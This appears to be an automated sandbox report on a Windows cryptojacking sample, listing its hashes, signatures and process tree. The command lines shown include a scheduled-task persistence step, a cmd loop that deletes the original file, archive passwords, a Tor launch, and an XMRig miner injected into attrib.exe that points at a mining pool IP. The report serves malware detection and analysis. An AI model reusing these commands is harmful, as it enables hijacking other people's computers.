Resubmissions
11/04/2024, 09:34
240411-ljrrgabh4y 1011/04/2024, 09:34
240411-ljrfpsgf98 1011/04/2024, 09:34
240411-ljqt6sgf97 1011/04/2024, 09:34
240411-ljqjeagf96 1011/04/2024, 09:33
240411-ljpxwagf95 1009/04/2024, 02:59
240409-dgzqasce34 1009/04/2024, 02:58
240409-dgnb9sce28 1009/04/2024, 02:58
240409-df5vxsga5x 1009/04/2024, 02:56
240409-de62lacd79 1029/02/2024, 05:28
240229-f59xaafe58 10Analysis
-
max time kernel
300s -
max time network
293s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
11/04/2024, 09:34
Static task
static1
Behavioral task
behavioral1
Sample
61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe
Resource
win10v2004-20240226-en
General
-
Target
61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe
-
Size
16.0MB
-
MD5
b8e2ec7d64fe3156c5f684b3a2757301
-
SHA1
565db0f626a875be0ba5234963727e45c01f3ca9
-
SHA256
61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3
-
SHA512
02894d45ddeb98471ce09a99e3b4fe6e23b03e17c77ffba31d6a5e58b2a3b17eba3f8c8b81988b82aacca385ecc6dc752aa1ed62681909ff3d67acaf56a697d6
-
SSDEEP
393216:OccUL96juOB/a7LOupqeRbz9rmGuXrERtpyw7c+AiT:FZJkazpqeRbrdZyAc+Ai
Malware Config
Signatures
-
XMRig Miner payload 4 IoCs
resource yara_rule behavioral1/memory/1724-3024-0x0000000000210000-0x0000000000D00000-memory.dmp xmrig behavioral1/memory/1724-3027-0x0000000000210000-0x0000000000D00000-memory.dmp xmrig behavioral1/memory/1724-3028-0x0000000000210000-0x0000000000D00000-memory.dmp xmrig behavioral1/memory/1724-3037-0x0000000000210000-0x0000000000D00000-memory.dmp xmrig -
Deletes itself 1 IoCs
pid Process 2348 cmd.exe -
Executes dropped EXE 19 IoCs
pid Process 2456 CL_Debug_Log.txt 472 Updts.exe 524 Updts.exe 752 Updts.exe 1428 Updts.exe 2716 Updts.exe 1776 tor.exe 1276 Updts.exe 1704 Updts.exe 1532 Updts.exe 2152 Updts.exe 2844 Updts.exe 3008 Updts.exe 960 Updts.exe 1892 Updts.exe 1420 Updts.exe 568 Updts.exe 1428 Updts.exe 2040 Updts.exe -
Loads dropped DLL 13 IoCs
pid Process 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1948 taskeng.exe 1948 taskeng.exe 1636 Process not Found 752 Updts.exe 752 Updts.exe 1776 tor.exe 1776 tor.exe 1776 tor.exe 1776 tor.exe 1776 tor.exe 1776 tor.exe 1928 Process not Found -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000015cb3-23.dat autoit_exe behavioral1/files/0x0034000000015c50-30.dat autoit_exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 752 set thread context of 2716 752 Updts.exe 44 PID 752 set thread context of 1276 752 Updts.exe 47 PID 752 set thread context of 1724 752 Updts.exe 49 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2580 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3016 timeout.exe -
NTFS ADS 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winmgmts:\PIRBKNPS\root\CIMV2 Updts.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:\PIRBKNPS\root\CIMV2 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 15 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 752 Updts.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeRestorePrivilege 2456 CL_Debug_Log.txt Token: 35 2456 CL_Debug_Log.txt Token: SeSecurityPrivilege 2456 CL_Debug_Log.txt Token: SeSecurityPrivilege 2456 CL_Debug_Log.txt Token: SeRestorePrivilege 2716 Updts.exe Token: 35 2716 Updts.exe Token: SeSecurityPrivilege 2716 Updts.exe Token: SeSecurityPrivilege 2716 Updts.exe Token: SeRestorePrivilege 1276 Updts.exe Token: 35 1276 Updts.exe Token: SeSecurityPrivilege 1276 Updts.exe Token: SeSecurityPrivilege 1276 Updts.exe Token: SeLockMemoryPrivilege 1724 attrib.exe Token: SeLockMemoryPrivilege 1724 attrib.exe -
Suspicious use of FindShellTrayWindow 49 IoCs
pid Process 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 472 Updts.exe 472 Updts.exe 472 Updts.exe 524 Updts.exe 524 Updts.exe 524 Updts.exe 752 Updts.exe 752 Updts.exe 752 Updts.exe 1428 Updts.exe 1428 Updts.exe 1428 Updts.exe 1724 attrib.exe 1532 Updts.exe 1532 Updts.exe 1532 Updts.exe 1704 Updts.exe 1704 Updts.exe 1704 Updts.exe 2152 Updts.exe 2152 Updts.exe 2152 Updts.exe 2844 Updts.exe 2844 Updts.exe 2844 Updts.exe 3008 Updts.exe 3008 Updts.exe 3008 Updts.exe 960 Updts.exe 960 Updts.exe 960 Updts.exe 1892 Updts.exe 1892 Updts.exe 1892 Updts.exe 1420 Updts.exe 1420 Updts.exe 1420 Updts.exe 568 Updts.exe 568 Updts.exe 568 Updts.exe 1428 Updts.exe 1428 Updts.exe 1428 Updts.exe 2040 Updts.exe 2040 Updts.exe 2040 Updts.exe -
Suspicious use of SendNotifyMessage 48 IoCs
pid Process 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 472 Updts.exe 472 Updts.exe 472 Updts.exe 524 Updts.exe 524 Updts.exe 524 Updts.exe 752 Updts.exe 752 Updts.exe 752 Updts.exe 1428 Updts.exe 1428 Updts.exe 1428 Updts.exe 1532 Updts.exe 1532 Updts.exe 1532 Updts.exe 1704 Updts.exe 1704 Updts.exe 1704 Updts.exe 2152 Updts.exe 2152 Updts.exe 2152 Updts.exe 2844 Updts.exe 2844 Updts.exe 2844 Updts.exe 3008 Updts.exe 3008 Updts.exe 3008 Updts.exe 960 Updts.exe 960 Updts.exe 960 Updts.exe 1892 Updts.exe 1892 Updts.exe 1892 Updts.exe 1420 Updts.exe 1420 Updts.exe 1420 Updts.exe 568 Updts.exe 568 Updts.exe 568 Updts.exe 1428 Updts.exe 1428 Updts.exe 1428 Updts.exe 2040 Updts.exe 2040 Updts.exe 2040 Updts.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1668 wrote to memory of 2456 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 29 PID 1668 wrote to memory of 2456 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 29 PID 1668 wrote to memory of 2456 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 29 PID 1668 wrote to memory of 2456 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 29 PID 1668 wrote to memory of 2712 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 31 PID 1668 wrote to memory of 2712 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 31 PID 1668 wrote to memory of 2712 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 31 PID 1668 wrote to memory of 2712 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 31 PID 2712 wrote to memory of 2580 2712 cmd.exe 33 PID 2712 wrote to memory of 2580 2712 cmd.exe 33 PID 2712 wrote to memory of 2580 2712 cmd.exe 33 PID 2712 wrote to memory of 2580 2712 cmd.exe 33 PID 1668 wrote to memory of 2348 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 34 PID 1668 wrote to memory of 2348 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 34 PID 1668 wrote to memory of 2348 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 34 PID 1668 wrote to memory of 2348 1668 61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe 34 PID 2348 wrote to memory of 3016 2348 cmd.exe 36 PID 2348 wrote to memory of 3016 2348 cmd.exe 36 PID 2348 wrote to memory of 3016 2348 cmd.exe 36 PID 2348 wrote to memory of 3016 2348 cmd.exe 36 PID 1948 wrote to memory of 524 1948 taskeng.exe 40 PID 1948 wrote to memory of 524 1948 taskeng.exe 40 PID 1948 wrote to memory of 524 1948 taskeng.exe 40 PID 1948 wrote to memory of 472 1948 taskeng.exe 41 PID 1948 wrote to memory of 472 1948 taskeng.exe 41 PID 1948 wrote to memory of 472 1948 taskeng.exe 41 PID 472 wrote to memory of 752 472 Updts.exe 42 PID 472 wrote to memory of 752 472 Updts.exe 42 PID 472 wrote to memory of 752 472 Updts.exe 42 PID 524 wrote to memory of 1428 524 Updts.exe 43 PID 524 wrote to memory of 1428 524 Updts.exe 43 PID 524 wrote to memory of 1428 524 Updts.exe 43 PID 752 wrote to memory of 2716 752 Updts.exe 44 PID 752 wrote to memory of 2716 752 Updts.exe 44 PID 752 wrote to memory of 2716 752 Updts.exe 44 PID 752 wrote to memory of 2716 752 Updts.exe 44 PID 752 wrote to memory of 2716 752 Updts.exe 44 PID 752 wrote to memory of 1776 752 Updts.exe 46 PID 752 wrote to memory of 1776 752 Updts.exe 46 PID 752 wrote to memory of 1776 752 Updts.exe 46 PID 752 wrote to memory of 1276 752 Updts.exe 47 PID 752 wrote to memory of 1276 752 Updts.exe 47 PID 752 wrote to memory of 1276 752 Updts.exe 47 PID 752 wrote to memory of 1276 752 Updts.exe 47 PID 752 wrote to memory of 1276 752 Updts.exe 47 PID 752 wrote to memory of 1724 752 Updts.exe 49 PID 752 wrote to memory of 1724 752 Updts.exe 49 PID 752 wrote to memory of 1724 752 Updts.exe 49 PID 752 wrote to memory of 1724 752 Updts.exe 49 PID 752 wrote to memory of 1724 752 Updts.exe 49 PID 1948 wrote to memory of 1704 1948 taskeng.exe 51 PID 1948 wrote to memory of 1704 1948 taskeng.exe 51 PID 1948 wrote to memory of 1704 1948 taskeng.exe 51 PID 1948 wrote to memory of 1532 1948 taskeng.exe 52 PID 1948 wrote to memory of 1532 1948 taskeng.exe 52 PID 1948 wrote to memory of 1532 1948 taskeng.exe 52 PID 1532 wrote to memory of 2152 1532 Updts.exe 53 PID 1532 wrote to memory of 2152 1532 Updts.exe 53 PID 1532 wrote to memory of 2152 1532 Updts.exe 53 PID 1948 wrote to memory of 2844 1948 taskeng.exe 54 PID 1948 wrote to memory of 2844 1948 taskeng.exe 54 PID 1948 wrote to memory of 2844 1948 taskeng.exe 54 PID 1948 wrote to memory of 3008 1948 taskeng.exe 55 PID 1948 wrote to memory of 3008 1948 taskeng.exe 55 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1724 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe"C:\Users\Admin\AppData\Local\Temp\61b322051908949b1fe40f5ab5995cec4c2f1abb6628e5f798cab8a91f42d0e3.exe"1⤵
- Loads dropped DLL
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txtC:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\Admin\AppData\Local\Temp\"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"2⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"3⤵
- Creates scheduled task(s)
PID:2580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c For /L %i In (0,0,0) Do (del "C:\Users\Admin\AppData\Local\Temp\61B322~1.EXE"&&timeout /t 0&&if not exist "C:\Users\Admin\AppData\Local\Temp\61B322~1.EXE" exit)2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\SysWOW64\timeout.exetimeout /t 03⤵
- Delays execution with timeout.exe
PID:3016
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {51FAFA64-1845-4851-87CF-4B2F2AD0973F} S-1-5-21-1658372521-4246568289-2509113762-1000:PIRBKNPS\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe -SystemCheck2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe" -SystemCheck743093⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1428
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe -SystemCheck2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:472 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe" -SystemCheck743093⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe" -f TorConfig4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1776
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
-
C:\Windows\System32\attrib.exe-o stratum+tcp://92.119.112.209:5555 -u -p x -t 44⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Views/modifies file attributes
PID:1724
-
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe -SystemCheck2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1704
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe -SystemCheck2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe" -SystemCheck743093⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2152
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe -SystemCheck2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2844 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe" -SystemCheck743093⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:960
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe -SystemCheck2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3008 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe" -SystemCheck743093⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1892
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe -SystemCheck2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1420 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe" -SystemCheck743093⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1428
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe -SystemCheck2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:568 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Updts.exe" -SystemCheck743093⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2040
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7.4MB
MD542da03d20542bf824f217214258fca1a
SHA15a4cf5f819d784973e3d9b4cc61f431cfc8e7564
SHA2564e57e739833686c5951a78b783973e8f79445868ad3e3621a1ab9eaa559d78d7
SHA512a9d15c0b4ba37fe0c9738311c9825b4aa6b0f0c105f6721affdfbe23065a924bfed300cdb990877fe5036e47279c671c262193de18e32528584cd2f7a71fb212
-
Filesize
8.4MB
MD51f8173ce565d749dec7e11f40110ddd8
SHA14d375fa658b16e9ce1217cc9dc4161e418126228
SHA256f3983921f687f6de73a7640d50393ab8ca1e8faa8d1031e08276f5a3db747b4a
SHA512036c172c82820553c4d8613cb8aca0acd2491cf2b4d23a2f816e273a6b22493e9fe9d45b02c0250247dd7d8d8331460b24f9fe224c9b36444c6c248b4e59eb92
-
Filesize
14.6MB
MD58d9b3986dfe0a08cd9c7e4dcce1936c7
SHA1fe8f379c0014dda5783d4730947ab280e0856cfc
SHA2562cff8e2b9d115e9a5dabe687f776cb548d9bb42f50881ad2ebcc964ef8ad2775
SHA512d1baf085c2b7d5d2d84f4c7a0676282989594318cfdf8a3b05a2d16f4cd33b128bb6540993efcd56e03155157d5b2bd8d3e1091d657cbbce789069941b992455
-
Filesize
2KB
MD5725bf5d38461e8fe65aacb46fd09458e
SHA19f20129f55de7ae251ae2d1277f96df4908b836a
SHA256b25bf441a40738723589d7d301112fa630672766b1fff9368bbdb709f660d613
SHA5123918e9dcd028619f4d82a027f43987aad96c56d587e71ad0d42ae64a4bd0adf4605032b2b89bb7de37e4cf073184d11f885eac40722747d1a2cc63976b158135
-
Filesize
14.6MB
MD533b9825bd5ca7a974a1dddf9ea3001ca
SHA1c30a2ab78c10127e27f48ec69eb61038aec4f111
SHA256cc9474e1d4129cf9b4c02a6c948ca8b6f52d806811c719ecfb108c977d4090e4
SHA512bc33b87c331d215ea5abdfe62a2f3d38af49bfa4db443b4b8cdad89e72fd8baf8d6b491bde148899ad9401560f38ebb18b5668669f9380a168e386f562a36603
-
Filesize
11KB
MD5f3d801f434a1de86ef52402fe1a8fb4c
SHA193789c51bd561f6c216960ce99c605fff93e613b
SHA2563321cf0e3288dcdfde7379e6c6f43a3079b95bb8c1e9480404804ebfc6c94562
SHA512472014d4cd6189510d584b024f8a406f61a6b2342703af7ea989b37b26d8466e77d05ea0b3ad20446b4572cf584a13e90acb72017641036d4e3e385b8c846ab2
-
Filesize
64KB
MD54ba229ec0856ae1fa70810e04bfcbb8f
SHA18851e59245857c2709163320dcd4637f98597380
SHA25600eee6ddbe598c0ebd68e5376865c9d51bb857be87fe630d8a50f36d9bc8c8e7
SHA5128d94b6a5e45e6b1dde524389fe1a258ad718ecf8b89dcb20871f2b4a31b7aea2ff1fb695481b4076b9b03bc406ee4e18cc983e8aa3d7b82b02f65c579ac7821f
-
Filesize
2.5MB
MD51df6c9dc09d318a9372b9af690fe588c
SHA1210efca3b7df334d978d47a5ff995e8cafb7e491
